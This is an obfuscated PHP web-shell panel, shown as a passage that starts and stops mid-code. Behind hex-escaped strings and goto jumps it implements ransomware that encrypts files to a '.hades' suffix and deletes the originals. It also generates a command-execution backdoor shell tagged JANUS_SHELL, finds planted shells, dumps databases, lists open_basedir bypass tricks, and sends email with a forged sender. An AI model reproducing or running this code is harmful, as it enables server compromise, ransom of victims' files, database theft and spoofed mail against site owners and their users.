$_POST["\x63\157\144\145"]; goto gapob; qVKXs: $v1Pog = ["\163\x74\141\x74\x75\163" => "\x73\165\143\x63\x65\x73\163", "\157\x62\146\x75\163\x63\141\x74\145\x64" => $BbbEp, "\x6f\162\151\x67\151\156\x61\154\137\x73\151\x7a\145" => strlen($RFZ8l), "\157\x62\x66\165\x73\x63\x61\164\145\144\x5f\x73\x69\172\145" => strlen($BbbEp)]; goto DHKDe; fAJB1: case "\162\x61\x6e\x73\157\x6d\x5f\x65\x6e\x63\x72\x79\x70\164\137\146\151\154\145\x73": goto JhWVV; S_Bmq: $xf6uV = [$_SESSION["\x63\x77\x64"]]; goto g7xIE; S2Ymx: if (is_array($lsfow)) { goto nqEf0; } goto OSJJK; J5LUl: xaDN7: goto XIecS; OuwAT: nbbv5: goto Zq2xA; YyP0r: $p2RFD = $tIZz1; goto I72XZ; LdT_y: if (is_array($p2RFD)) { goto xaDN7; } goto ikulV; uutqX: $v1Pog["\155\145\163\x73\x61\x67\x65"] = "\116\157\x20\x66\x69\x6c\x65\163\40\157\162\x20\x65\x78\164\x65\156\163\x69\x6f\156\163\40\163\x65\154\x65\143\164\145\x64\x2e"; goto ghw2f; mEaeW: $lsfow = $_POST["\x65\170\x74\x65\156\x73\x69\157\156\x73"] ?? null; goto S2Ymx; OSJJK: if (is_string($lsfow) && !empty($lsfow)) { goto iPXlW; } goto sPLRp; DBJyd: foreach ($xf6uV as $cixXX) { goto PTEOR; A4FHB: $yPpFX = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($cixXX, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto nbKGL; YlL0S: dhh7o: goto Mb_Es; PTEOR: if (is_dir($cixXX)) { goto OdWRb; } goto KVAeF; KVAeF: goto dhh7o; goto a4pvJ; Z2Kan: L8K_t: goto YlL0S; nbKGL: foreach ($yPpFX as $Q0s1i) { goto tR0_G; cV1XI: $EIk9m[] = $Q0s1i->getRealPath(); goto EiZdr; EiZdr: fkS9C: goto ZMcbt; ZMcbt: hGGB7: goto y2q3Z; tR0_G: if (!$Q0s1i->isFile()) { goto hGGB7; } goto A8wKG; lm8Sd: if (!in_array($FNvcl, $rkMSQ)) { goto fkS9C; } goto cV1XI; A8wKG: $FNvcl = strtolower($Q0s1i->getExtension()); goto lm8Sd; y2q3Z: pdotm: goto fxnPb; fxnPb: } goto Z2Kan; a4pvJ: OdWRb: goto A4FHB; Mb_Es: } goto fZ1R5; E7iIP: $WXlO2 = 0; goto jzipS; FK9pk: nqEf0: goto n4138; EAd9D: rTtG0: goto YyP0r; cprlu: $EIk9m = array_unique($EIk9m); goto e5M8s; LWziu: if (is_array($rkMSQ)) { goto iqqph; } goto dJRaN; ff6Po: goto t2Mo1; goto FK9pk; n4138: $rkMSQ = $lsfow; goto o55Nt; KL0Uj: RSgH6: goto SHp9U; Zq2xA: $p2RFD = json_decode($tIZz1, true); goto LdT_y; D2q2U: iPXlW: goto fVdUc; fZ1R5: MN1rr: goto XsLj4; pzWae: if (empty($rkMSQ)) { goto Ppe33; } goto mI0HJ; zB62N: goto vbH70; goto dHy3I; g7xIE: zZYr0: goto DBJyd; s3M13: $dTrV6 = hash("\x73\x68\141\62\x35\x36", $IMtDv, true); goto Dvjjd; sPLRp: $rkMSQ = []; goto ff6Po; tDqZi: $xf6uV = is_array($yTFOv) ? $yTFOv : (is_string($yTFOv) && !empty($yTFOv) ? explode("\x2c", $yTFOv) : [$_SESSION["\143\x77\144"]]); goto f12Id; ZJB6F: $IMtDv = $_POST["\160\141\x73\x73\x77\157\x72\144"] ?? bin2hex(random_bytes(16)); goto mEaeW; JhWVV: $tIZz1 = $_POST["\146\151\x6c\x65\x73"] ?? null; goto wYME9; ghw2f: goto vbH70; goto Qin0q; wYME9: if (is_array($tIZz1)) { goto rTtG0; } goto IM60l; ikulV: $p2RFD = []; goto J5LUl; wI8Dp: t2Mo1: goto E7iIP; dJRaN: $rkMSQ = []; goto oiltd; Qin0q: kxMxx: goto s3M13; qvlC7: $p2RFD = []; goto eqiMr; mI0HJ: $yTFOv = $_POST["\x73\x65\141\x72\143\150\x5f\160\x61\164\x68\163"] ?? $_SESSION["\143\x77\x64"]; goto tDqZi; XsLj4: Ppe33: goto cprlu; zj09c: if (!(empty($p2RFD) && empty($rkMSQ))) { goto kxMxx; } goto uutqX; SHp9U: $v1Pog = ["\x73\x74\141\x74\x75\x73" => "\163\165\x63\143\145\163\163", "\x65\x6e\x63\162\x79\160\x74\145\x64\137\x63\157\x75\x6e\x74" => $WXlO2, "\146\141\x69\154\x65\x64\x5f\143\x6f\165\x6e\164" => $sXL5l, "\x74\x6f\x74\141\x6c\137\146\x69\154\145\x73" => count($EIk9m), "\160\141\163\x73\x77\157\x72\x64" => $IMtDv, "\x72\145\163\x75\x6c\164\x73" => $gSi8X, "\x6d\145\163\x73\141\147\145" => "\105\x6e\143\162\171\160\164\145\x64\x20{$WXlO2}\40\x66\151\x6c\145\x28\163\x29\x2c\x20{$sXL5l}\40\146\x61\x69\154\x65\x64\56"]; goto zB62N; e5M8s: foreach ($EIk9m as $UKZxE) { goto WY1gs; WY1gs: if (!(!is_file($UKZxE) || !is_readable($UKZxE))) { goto zeyjI; } goto HoLiT; Pwjt8: goto JQdkS; goto KeVbJ; HoLiT: $sXL5l++; goto oGcxe; Z3CyY: goto JQdkS; goto K9joy; oGcxe: $gSi8X[] = ["\x66\x69\x6c\145" => $UKZxE, "\163\x74\141\164\165\x73" => "\146\141\151\154\x65\x64", "\x72\145\x61\x73\157\156" => "\106\151\154\x65\40\x6e\157\x74\40\x66\x6f\x75\156\144\x20\157\x72\x20\156\157\x74\x20\x72\x65\x61\x64\x61\x62\154\x65"]; goto Z3CyY; JczJW: try { goto Nl2ab; nVqZY: kjr8F: goto qnkao; cjA1V: $gSi8X[] = ["\146\x69\x6c\145" => $UKZxE, "\163\164\141\x74\165\163" => "\x66\141\151\154\x65\x64", "\x72\145\x61\x73\157\156" => "\105\x6e\x63\x72\x79\160\x74\x69\157\156\40\x66\141\151\x6c\x65\x64"]; goto LRw94; LRw94: goto JQdkS; goto ATBfP; DPbmq: goto kjr8F; goto WuWGm; MFiBl: $sXL5l++; goto cjA1V; ATBfP: ZwZau: goto jJq8T; RqSmt: @unlink($UKZxE); goto qvuAO; Nl2ab: $siOBH = file_get_contents($UKZxE); goto fUh2y; QIzms: $sXL5l++; goto d83j9; qvuAO: $WXlO2++; goto VJA7v; jJq8T: $VJe6T = $UKZxE . "\56\x68\141\x64\x65\x73"; goto hJezv; hJezv: if (file_put_contents($VJe6T, $JkBdw)) { goto Vkp20; } goto QIzms; fUh2y: $JkBdw = oXQhu($siOBH, $IMtDv); goto H6aIl; WuWGm: Vkp20: goto RqSmt; H6aIl: if (!($JkBdw === false || empty($JkBdw))) { goto ZwZau; } goto MFiBl; VJA7v: $gSi8X[] = ["\x66\x69\x6c\145" => $UKZxE, "\163\x74\x61\x74\165\x73" => "\x65\x6e\x63\x72\171\x70\164\145\x64", "\x65\156\143\x72\171\x70\164\x65\x64\x5f\146\151\x6c\145" => $VJe6T]; goto nVqZY; d83j9: $gSi8X[] = ["\146\151\x6c\x65" => $UKZxE, "\163\x74\141\164\x75\163" => "\x66\x61\151\x6c\x65\x64", "\x72\x65\x61\x73\x6f\x6e" => "\106\141\151\x6c\x65\x64\40\164\x6f\x20\167\x72\151\164\145\x20\x65\x6e\x63\x72\x79\160\x74\145\x64\40\146\x69\x6c\x65"]; goto DPbmq; qnkao: } catch (Exception $smUM0) { $sXL5l++; $gSi8X[] = ["\146\x69\154\145" => $UKZxE, "\163\x74\x61\164\165\x73" => "\x66\x61\151\154\x65\144", "\162\x65\x61\163\x6f\x6e" => $smUM0->getMessage()]; } goto wh8yd; t7Q9u: $gSi8X[] = ["\146\151\154\x65" => $UKZxE, "\163\164\x61\164\x75\x73" => "\x73\153\x69\x70\160\145\x64", "\x72\145\141\163\157\156" => "\x41\x6c\x72\x65\x61\x64\x79\x20\145\156\x63\162\x79\160\x74\145\144"]; goto Pwjt8; KeVbJ: MN0se: goto JczJW; u1GmU: if (!(substr($UKZxE, -6) === "\56\150\x61\144\x65\x73")) { goto MN0se; } goto t7Q9u; wh8yd: JQdkS: goto p29Dx; K9joy: zeyjI: goto u1GmU; p29Dx: } goto KL0Uj; eqiMr: goto tLtUp; goto EAd9D; IM60l: if (is_string($tIZz1) && !empty($tIZz1)) { goto nbbv5; } goto qvlC7; o55Nt: goto t2Mo1; goto D2q2U; jzipS: $sXL5l = 0; goto X2vMA; oiltd: iqqph: goto wI8Dp; X2vMA: $gSi8X = []; goto zj09c; Dvjjd: $EIk9m = $p2RFD; goto pzWae; fVdUc: $rkMSQ = json_decode($lsfow, true); goto LWziu; XIecS: tLtUp: goto ZJB6F; I72XZ: goto tLtUp; goto OuwAT; f12Id: if (is_array($xf6uV)) { goto zZYr0; } goto S_Bmq; dHy3I: case "\162\141\x6e\163\157\155\x5f\144\x65\143\162\171\160\164\137\146\x69\x6c\145": goto k_Xu0; Ng1lj: Ncwc3: goto Jz0l2; AKPAh: if (!(!is_file($VJe6T) || !is_readable($VJe6T))) { goto Ncwc3; } goto rQpuP; wMAiv: @unlink($VJe6T); goto tUXhe; ZWuJL: $AXEU0 = y3_EJ($JkBdw, $IMtDv); goto NnyBU; UwArG: $v1Pog["\x6d\x65\x73\x73\141\x67\145"] = "\106\141\151\154\x65\144\x20\164\x6f\40\x77\162\x69\x74\145\40\144\145\x63\162\x79\160\164\x65\144\40\146\x69\154\x65\56"; goto iXQbc; PNv5G: goto vbH70; goto cAuoJ; iXQbc: goto uL6p9; goto Xjymo; tUXhe: $v1Pog = ["\163\x74\141\164\x75\x73" => "\x73\x75\x63\143\x65\163\163", "\155\x65\163\x73\x61\x67\x65" => "\106\x69\x6c\x65\x20\x64\145\x63\162\171\160\x74\x65\144\x20\x73\165\x63\143\145\163\x73\x66\x75\x6c\154\171\x2e", "\x6f\162\x69\147\x69\x6e\x61\x6c\137\x66\x69\x6c\x65" => $UDJjV]; goto QLWok; k_Xu0: $VJe6T = $_POST["\x65\156\143\162\x79\x70\x74\145\x64\137\146\151\x6c\x65"]; goto KebC1; Xjymo: BdLWd: goto wMAiv; Bfa9j: goto vbH70; goto XN2XF; Fc5Hz: $v1Pog["\155\145\163\163\141\147\x65"] = "\x44\x65\143\x72\171\x70\x74\151\157\x6e\40\146\x61\x69\x6c\x65\x64\56\40\x57\162\157\x6e\147\x20\160\x61\163\x73\x77\157\162\144\40\157\162\40\x63\157\x72\x72\165\x70\164\145\144\40\x66\151\154\145\x2e"; goto Bfa9j; Jz0l2: $JkBdw = file_get_contents($VJe6T); goto ZWuJL; JIAbR: if (file_put_contents($UDJjV, $AXEU0)) { goto BdLWd; } goto UwArG; lcl0s: $UDJjV = preg_replace("\57\x5c\x2e\150\141\x64\145\x73\x24\57", '', $VJe6T); goto JIAbR; NnyBU: if (!($AXEU0 === false || empty($AXEU0))) { goto CGeQp; } goto Fc5Hz; rQpuP: $v1Pog["\155\145\163\x73\x61\x67\145"] = "\105\156\143\x72\171\x70\x74\145\144\x20\x66\151\x6c\x65\x20\156\x6f\x74\40\146\x6f\x75\156\144\40\157\162\40\156\x6f\164\40\x72\x65\141\x64\x61\142\x6c\145\56"; goto KxsfH; XN2XF: CGeQp: goto lcl0s; KxsfH: goto vbH70; goto Ng1lj; QLWok: uL6p9: goto PNv5G; KebC1: $IMtDv = $_POST["\160\141\163\x73\167\x6f\x72\144"]; goto AKPAh; cAuoJ: case "\x67\x65\x6e\x65\162\x61\164\145\x5f\x77\145\142\x73\150\145\154\154": goto jPCFJ; gs87O: $v1Pog = ["\163\x74\x61\164\x75\x73" => "\163\165\143\143\x65\163\163", "\x73\150\145\154\x6c\137\143\157\x64\145" => $OM6Ip, "\164\171\160\x65" => $shC_W, "\x69\144\x65\156\164\x69\146\x69\x65\162" => $GQA2B]; goto S_sJF; S_sJF: goto vbH70; goto v1q6g; jPCFJ: $shC_W = $_POST["\164\171\160\145"] ?? "\x70\150\160"; goto XC8j2; nTBqJ: $FfdOo = base64_encode($IMtDv); goto Hfx2C; nG6PY: $GQA2B = "\112\101\116\x55\123\x5f\x53\110\105\x4c\114\137\x49\x44\x45\116\x54\x49\106\x49\105\122\137" . md5($IMtDv . time()); goto nTBqJ; XC8j2: $IMtDv = $_POST["\x70\141\x73\163\167\x6f\x72\x64"] ?? "\152\x61\156\x75\163"; goto nG6PY; Hfx2C: $OM6Ip = "\x3c\x3f\160\x68\x70\xa\x2f\57{$GQA2B}\xa\44\x70\75\142\141\163\x65\x36\x34\137\144\x65\143\157\x64\145\50\x27{$FfdOo}\x27\x29\73\xa\x69\x66\x28\151\163\x73\145\164\x28\x24\137\107\105\x54\133\x24\x70\135\x29\174\x7c\151\163\163\145\164\50\x24\137\120\117\x53\124\133\x24\160\x5d\x29\x29\x7b\xa\x24\143\x3d\x69\163\x73\x65\164\50\x24\x5f\107\x45\124\133\44\x70\135\x29\x3f\x24\x5f\107\105\124\x5b\x24\160\x5d\72\x24\137\120\117\123\x54\133\x24\x70\135\x3b\12\x69\146\50\x24\x63\46\46\x74\x72\x69\155\x28\44\x63\x29\x29\173\12\151\x66\50\x66\165\x6e\143\164\x69\157\156\137\x65\170\x69\163\x74\163\x28\47\163\150\145\154\x6c\137\x65\170\x65\143\47\x29\x29\173\145\143\150\x6f\40\100\x73\150\x65\154\154\137\x65\x78\145\143\x28\x24\143\x29\x3b\175\145\154\163\145\x69\x66\50\x66\165\x6e\143\x74\151\157\x6e\x5f\x65\x78\151\x73\164\163\50\47\145\x78\145\x63\47\x29\x29\173\100\145\170\x65\143\x28\x24\x63\x2c\x24\157\x29\73\145\x63\150\x6f\40\x69\155\x70\x6c\x6f\144\x65\x28\x22\x5c\x6e\42\x2c\44\157\x29\x3b\175\145\154\x73\145\x69\x66\50\x66\x75\x6e\x63\164\151\157\156\x5f\x65\170\151\163\x74\163\50\x27\x73\171\163\164\x65\155\x27\x29\x29\x7b\100\x73\171\163\x74\x65\x6d\x28\44\143\51\73\x7d\145\154\163\x65\151\x66\x28\x66\165\x6e\143\x74\151\157\156\x5f\x65\x78\151\163\x74\x73\50\x27\160\x61\x73\x73\164\150\162\x75\47\51\51\173\x40\x70\x61\163\163\x74\x68\x72\165\50\x24\x63\51\73\175\xa\x7d\12\175\xa\x3f\76"; goto gs87O; v1q6g: case "\154\x69\x73\164\x5f\x77\x65\x62\x73\x68\x65\154\x6c\163": goto KQuRb; sr2Ve: F3IGR: goto JcuHR; GY7K6: goto vbH70; goto DKwKQ; SlftA: foreach ($yPpFX as $Q0s1i) { goto X0btW; sKS0F: $UKZxE = $Q0s1i->getRealPath(); goto ZSsoz; rEAr5: $GQA2B = $I5WkF[1]; goto bdqFs; iFBnh: JUy9H: goto K17FG; xKRH0: if (!($Lrz4Z && strpos($Lrz4Z, $xJ3QU) !== false)) { goto JUy9H; } goto pb3WK; pb3WK: $GQA2B = ''; goto tNKm2; ZSsoz: $Lrz4Z = @file_get_contents($UKZxE); goto xKRH0; K17FG: l1R1E: goto uIs5d; PHhfS: $W2rRC[] = ["\x70\x61\164\x68" => $UKZxE, "\x6e\x61\x6d\145" => $Q0s1i->getFilename(), "\163\x69\172\145" => $Q0s1i->getSize(), "\x6d\x6f\144\151\x66\x69\x65\x64" => date("\x59\x2d\x6d\x2d\144\40\x48\x3a\151\72\163", $Q0s1i->getMTime()), "\160\x65\x72\155\151\163\x73\151\x6f\156\x73" => substr(sprintf("\x25\x6f", $Q0s1i->getPerms()), -4), "\151\144\145\x6e\x74\151\x66\151\x65\x72" => $GQA2B]; goto iFBnh; uIs5d: hnfU0: goto s4_rb; bdqFs: mGRYf: goto PHhfS; X0btW: if (!($Q0s1i->isFile() && strtolower($Q0s1i->getExtension()) === "\160\150\160")) { goto l1R1E; } goto sKS0F; tNKm2: if (!preg_match("\x2f\x5c\x2f\134\57\x28" . preg_quote($xJ3QU, "\x2f") . "\133\141\55\x66\x30\x2d\x39\x5d\x7b\x33\x32\175\x29\x2f", $Lrz4Z, $I5WkF)) { goto mGRYf; } goto rEAr5; s4_rb: } goto ze0ZR; WHuXG: $xJ3QU = "\x4a\101\116\x55\x53\x5f\x53\x48\x45\x4c\x4c\x5f\111\x44\x45\x4e\x54\x49\x46\111\x45\x52\x5f"; goto vqOfo; vqOfo: $W2rRC = []; goto qLgMz; ze0ZR: Y44g2: goto sr2Ve; KQuRb: $cixXX = $_POST["\163\x65\141\x72\x63\150\137\x70\141\x74\x68"] ?? $_SESSION["\143\x77\144"]; goto WHuXG; qLgMz: if (!is_dir($cixXX)) { goto F3IGR; } goto vz3DB; JcuHR: $v1Pog = ["\163\x74\141\x74\165\x73" => "\163\165\x63\143\145\163\x73", "\x73\x68\145\154\154\163" => $W2rRC, "\x63\157\165\x6e\x74" => count($W2rRC)]; goto GY7K6; vz3DB: $yPpFX = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($cixXX, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto SlftA; DKwKQ: case "\143\x6f\154\165\155\156\137\144\165\155\160\x65\162": goto MZYGt; w4sOP: goto vbH70; goto DKozy; Y6BDA: $v1Pog["\x6d\145\x73\163\141\x67\145"] = "\x41\154\154\x20\146\x69\x65\154\x64\x73\40\141\162\145\x20\x72\x65\161\165\x69\162\x65\x64\x2e"; goto w4sOP; DKozy: Os9eY: goto Duw7A; V8T1q: $OMjut = $_POST["\x74\x61\142\x6c\145"] ?? ''; goto NuKdP; NuKdP: $xSfnm = $_POST["\x63\x6f\x6c\x75\155\156"] ?? ''; goto XWQTO; XWQTO: if (!(empty($NFCPX) || empty($qhLRz) || empty($zwCjy) || empty($OMjut) || empty($xSfnm))) { goto Os9eY; } goto Y6BDA; MZYGt: $NFCPX = $_POST["\x68\157\163\164"] ?? ''; goto Yf84j; qDNNd: $zwCjy = $_POST["\144\141\164\x61\x62\141\x73\x65"] ?? ''; goto V8T1q; HVzFL: $LVldf = $_POST["\x70\141\163\x73"] ?? ''; goto qDNNd; fGkV0: goto vbH70; goto uBpjF; Yf84j: $qhLRz = $_POST["\x75\x73\145\x72"] ?? ''; goto HVzFL; Duw7A: try { goto fx2gs; LF4Kj: $olRGv = $JHnly->query($Knm__); goto NOyR3; DMcLs: if (!$JHnly->OxgvR) { goto I8PUA; } goto qM9I2; MMTn3: $v1Pog = ["\x73\164\x61\164\165\163" => "\x73\165\143\x63\145\x73\163", "\144\x61\x74\x61" => $siOBH, "\143\157\165\156\x74" => count($siOBH)]; goto XOwtH; e43Im: goto vbH70; goto ieCiv; gIUsV: $OMjut = $JHnly->x_rS7($OMjut); goto D3VKx; KrvEH: $JHnly->close(); goto MMTn3; NOyR3: $siOBH = []; goto FSgMf; D3VKx: $Knm__ = "\x53\x45\114\105\x43\x54\40\x60{$xSfnm}\140\40\106\x52\x4f\115\40\x60{$OMjut}\x60"; goto LF4Kj; h5rWs: goto frH3H; goto ehADL; qJD2a: JBMZd: goto KrvEH; M3Fs5: $xSfnm = $JHnly->X_RS7($xSfnm); goto gIUsV; UpWta: if (!($nzVFs = $olRGv->xHUtM())) { goto ywefJ; } goto K7DoE; fx2gs: $JHnly = @new mvRBd($NFCPX, $qhLRz, $LVldf, $zwCjy); goto DMcLs; ehADL: ywefJ: goto qJD2a; K7DoE: $siOBH[] = $nzVFs[$xSfnm]; goto h5rWs; qM9I2: $v1Pog["\x6d\145\x73\163\x61\x67\145"] = "\x43\157\156\x6e\x65\x63\164\x69\x6f\156\x20\146\141\x69\x6c\145\144\72\x20" . $JHnly->OxgvR; goto e43Im; ieCiv: I8PUA: goto M3Fs5; dq3u7: frH3H: goto UpWta; FSgMf: if (!($olRGv && $olRGv->E7CAU > 0)) { goto JBMZd; } goto dq3u7; XOwtH: } catch (Exception $smUM0) { $v1Pog["\155\x65\x73\163\x61\147\145"] = "\105\x72\x72\157\x72\x3a\40" . $smUM0->getMessage(); } goto fGkV0; uBpjF: case "\144\141\x74\141\x62\x61\x73\145\137\x64\x75\x6d\x70\x65\162": goto oLBJV; goVw4: $v1Pog["\155\x65\x73\x73\141\147\x65"] = "\110\x6f\x73\x74\x2c\40\165\163\145\162\x2c\40\141\156\x64\40\x64\141\x74\141\x62\141\x73\x65\40\141\x72\145\40\162\x65\x71\165\x69\162\x65\144\56"; goto uUOIL; SynZP: RxUZH: goto CXguq; uUOIL: goto vbH70; goto SynZP; IJY0H: goto vbH70; goto a7xLI; CXguq: try { goto cP10c; qejcG: WNYOQ: goto kZ0Oa; lxUuP: i_feN: goto U2QkQ; lvIQJ: jYjsQ: goto spdjs; E5gfF: $OMjut = $nzVFs[0]; goto y1uGv; spdjs: $JHnly->close(); goto gypLI; gypLI: $v1Pog = ["\163\x74\141\164\165\x73" => "\x73\165\x63\x63\x65\x73\163", "\x64\x75\155\x70" => $YK16Z, "\164\141\142\154\x65\163" => count($nAjBb)]; goto mtf6H; YoufC: $v1Pog["\155\x65\x73\163\x61\147\x65"] = "\x43\157\156\156\145\143\x74\x69\157\156\x20\x66\141\x69\154\x65\x64\72\x20" . $JHnly->OxgvR; goto IyyYn; IyyYn: goto vbH70; goto S2yIH; U2QkQ: uJrAD: goto E6aRO; jOsho: $nAjBb = []; goto GnYe1; kZ0Oa: if (!($nzVFs = $olRGv->OVvci())) { goto i_feN; } goto E5gfF; S2yIH: icJxB: goto jOsho; y1uGv: $nAjBb[] = $OMjut; goto pT1r8; RDC7F: if (!$olRGv) { goto uJrAD; } goto qejcG; GnYe1: $olRGv = $JHnly->query("\123\110\117\127\x20\124\x41\102\x4c\x45\123"); goto RDC7F; iHmhN: if (!$JHnly->OxgvR) { goto icJxB; } goto YoufC; cP10c: $JHnly = @new mvRbD($NFCPX, $qhLRz, $LVldf, $zwCjy); goto iHmhN; pT1r8: goto WNYOQ; goto lxUuP; E6aRO: $YK16Z = "\x2d\55\x20\104\141\164\x61\x62\141\163\x65\40\104\x75\155\160\72\x20{$zwCjy}\xa\55\55\x20\107\x65\156\145\x72\x61\x74\x65\x64\x3a\x20" . date("\x59\55\155\55\x64\40\110\x3a\151\72\163") . "\12\12"; goto k4qiC; k4qiC: foreach ($nAjBb as $OMjut) { goto em3Px; hJjH5: pxeij: goto B0lib; xefrY: if (!($nzVFs = $siOBH->XHutM())) { goto pxeij; } goto zMS5t; GJCrv: ThiEN: goto jxoBZ; jxoBZ: g1gng: goto GZu1n; YJ5VY: if (!($OvQ1E && ($nzVFs = $OvQ1E->XHUtm()))) { goto hdYJN; } goto cmyBL; oVgbI: $YK16Z .= "\x44\x52\117\x50\40\124\x41\102\114\x45\40\x49\x46\40\105\x58\x49\x53\x54\123\40\x60{$OMjut}\140\x3b\12"; goto uULui; wkcmc: hdYJN: goto X7xgP; B0lib: $YK16Z .= "\xa"; goto GJCrv; em3Px: $YK16Z .= "\x2d\x2d\40\x54\x61\142\154\145\x3a\40{$OMjut}\12"; goto oVgbI; Yvuam: goto pivh0; goto hJjH5; cmyBL: $YK16Z .= $nzVFs["\103\x72\x65\141\x74\145\40\x54\141\x62\154\145"] . "\x3b\xa\12"; goto wkcmc; pf4ko: if (!($siOBH && $siOBH->E7CAU > 0)) { goto ThiEN; } goto eEphv; eEphv: pivh0: goto xefrY; uULui: $OvQ1E = $JHnly->query("\123\110\x4f\127\x20\103\x52\105\x41\x54\105\x20\124\101\x42\114\x45\x20\140{$OMjut}\x60"); goto YJ5VY; X7xgP: $siOBH = $JHnly->query("\x53\x45\x4c\105\103\124\x20\x2a\x20\106\122\x4f\115\40\x60{$OMjut}\x60"); goto pf4ko; BZByR: $YK16Z .= "\111\x4e\123\105\x52\124\40\x49\x4e\124\117\40\140{$OMjut}\x60\40\126\101\x4c\x55\105\x53\40\x28" . implode("\x2c", $CyK4H) . "\51\x3b\12"; goto Yvuam; zMS5t: $CyK4H = array_map(function ($i4gn_) use($JHnly) { return "\47" . $JHnly->x_Rs7($i4gn_) . "\x27"; }, array_values($nzVFs)); goto BZByR; GZu1n: } goto lvIQJ; mtf6H: } catch (Exception $smUM0) { $v1Pog["\x6d\145\x73\x73\x61\147\x65"] = "\105\162\x72\157\x72\72\40" . $smUM0->getMessage(); } goto IJY0H; HOEvM: if (!(empty($NFCPX) || empty($qhLRz) || empty($zwCjy))) { goto RxUZH; } goto goVw4; f1TAu: $zwCjy = $_POST["\x64\141\164\x61\x62\x61\x73\145"] ?? ''; goto HOEvM; klkBL: $qhLRz = $_POST["\165\x73\145\162"] ?? ''; goto WwpmN; WwpmN: $LVldf = $_POST["\160\x61\163\x73"] ?? ''; goto f1TAu; oLBJV: $NFCPX = $_POST["\x68\x6f\163\164"] ?? ''; goto klkBL; a7xLI: case "\157\160\145\156\x5f\142\141\163\145\144\151\162\x5f\x62\171\160\141\163\163": goto AmSha; MRScG: $DUVC5 = []; goto HP2lF; azmL9: $DUVC5[] = ["\x6d\145\164\x68\x6f\144" => "\x69\x6e\151\x5f\x73\145\x74\x28\x29\x20\x42\x79\160\141\163\163", "\x63\x6f\144\x65" => "\x69\156\x69\137\x73\x65\164\x28\x27\157\160\x65\156\137\142\x61\163\145\144\x69\x72\47\x2c\40\47\x2e\x27\x29\73\x20\143\x68\x64\151\162\50\x27\x2e\x2e\x27\x29\x3b\x20\143\150\x64\x69\162\x28\x27\56\x2e\x27\51\x3b\40\143\150\x64\151\x72\50\x27\56\56\x27\x29\x3b\x20\x65\x63\x68\x6f\x20\x67\x65\x74\x63\x77\144\50\51\x3b"]; goto uxnan; uxnan: $v1Pog = ["\x73\164\x61\x74\x75\x73" => "\163\x75\x63\143\145\x73\x73", "\155\x65\x74\150\x6f\144\x73" => $DUVC5]; goto DUTQc; HP2lF: $DUVC5[] = ["\x6d\x65\164\x68\x6f\144" => "\x63\x68\x64\x69\x72\50\x29\x20\102\171\x70\141\x73\163", "\143\157\x64\145" => "\143\150\144\x69\162\50\x27\56\56\47\51\x3b\40\143\150\x64\151\162\x28\47\x2e\x2e\x27\51\x3b\x20\x63\150\144\x69\162\x28\47\56\x2e\x27\51\73\40\143\150\x64\151\162\x28\47\56\56\47\x29\73\x20\143\150\144\151\x72\x28\47\56\56\47\51\73\40\x65\x63\x68\x6f\x20\x67\x65\164\143\x77\x64\50\51\x3b"]; goto XKmPY; XKmPY: $DUVC5[] = ["\x6d\x65\x74\150\157\144" => "\163\x79\x6d\x6c\151\x6e\153\x28\51\x20\x42\x79\160\141\x73\x73", "\143\x6f\144\145" => "\x6d\x6b\x64\x69\162\x28\47\164\155\160\x27\x29\x3b\40\143\x68\x64\151\162\50\47\x74\155\160\x27\51\73\40\155\153\x64\x69\x72\50\x27\x62\171\x70\x61\x73\163\x27\51\73\x20\143\150\144\x69\162\x28\47\142\x79\x70\141\163\x73\x27\x29\73\40\155\153\x64\x69\x72\x28\47\160\167\x6e\145\144\47\51\x3b\x20\x63\150\x64\151\x72\50\47\56\56\47\51\x3b\x20\143\x68\x64\x69\x72\50\47\x2e\56\x27\51\x3b\x20\x73\x79\x6d\x6c\151\x6e\x6b\x28\x27\142\171\x70\x61\163\x73\57\160\x77\x6e\145\x64\x27\54\x20\47\x6c\x69\156\153\47\x29\x3b\40\143\150\x64\151\x72\x28\x27\x6c\x69\x6e\x6b\47\x29\x3b\40\143\x68\144\151\x72\x28\x27\56\56\x27\51\73\x20\165\x6e\154\151\x6e\x6b\x28\x27\154\x69\156\x6b\x27\x29\x3b\x20\162\x6d\144\x69\162\x28\x27\x62\171\160\141\163\x73\x27\x29\x3b\x20\162\x6d\x64\x69\162\x28\x27\160\x77\x6e\145\x64\x27\x29\73\40\143\150\144\x69\x72\50\x27\x2e\56\x27\51\x3b\x20\162\x6d\144\151\162\x28\47\x74\155\160\x27\51\x3b"]; goto azmL9; AmSha: $j3_hR = $_POST["\160\x61\x74\150"] ?? "\x2f"; goto MRScG; DUTQc: goto vbH70; goto ZbAN1; ZbAN1: case "\146\141\x6b\145\137\155\x61\151\154": goto NxTV1; SYM5A: if ($olRGv) { goto fIhAm; } goto DLE0V; EvXKA: goto vbH70; goto BthrM; GFfY5: fIhAm: goto AT1_x; QXs91: $EmQAC = "\x46\x72\157\x6d\x3a\x20{$CbYGj}\15\12"; goto yrk41; DLE0V: $v1Pog["\155\145\x73\x73\141\147\145"] = "\x46\x61\x69\154\x65\x64\40\164\x6f\40\x73\x65\156\x64\40\x65\x6d\x61\x69\154\56\40\x43\x68\x65\143\x6b\x20\x6d\141\151\154\x20\143\x6f\156\x66\151\147\165\x72\x61\x74\x69\157\x6e\x2e"; goto NrSbJ; yrk41: $EmQAC .= "\122\145\160\x6c\x79\x2d\x54\x6f\72\40{$CbYGj}\xd\12"; goto eXGse; zrLlt: eK6km: goto m0Ysr; NrSbJ: goto yGFdY; goto GFfY5; AT1_x: $v1Pog = ["\163\164\141\x74\x75\x73" => "\x73\x75\143\143\x65\163\163", "\155\145\x73\163\141\x67\145" => "\105\155\x61\151\x6c\40\163\145\x6e\164\40\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x21"]; goto rR7Oh; lbtcg: $RxRgD = $_POST["\163\x75\142\x6a\x65\x63\x74"] ?? ''; goto ntGjK; BthrM: dbjQR: goto QXs91; JIj0h: $olRGv = @mail($gU_W4, $RxRgD, $p0UP_, $EmQAC); goto SYM5A; IvP51: $CbYGj = $_POST["\146\162\x6f\x6d"] ?? ''; goto lbtcg; ntGjK: $p0UP_ = $_POST["\x6d\x65\x73\x73\x61\147\145"] ?? ''; goto a16R8; NxTV1: $gU_W4 = $_POST["\x74\157"] ?? ''; goto IvP51; CFy5l: 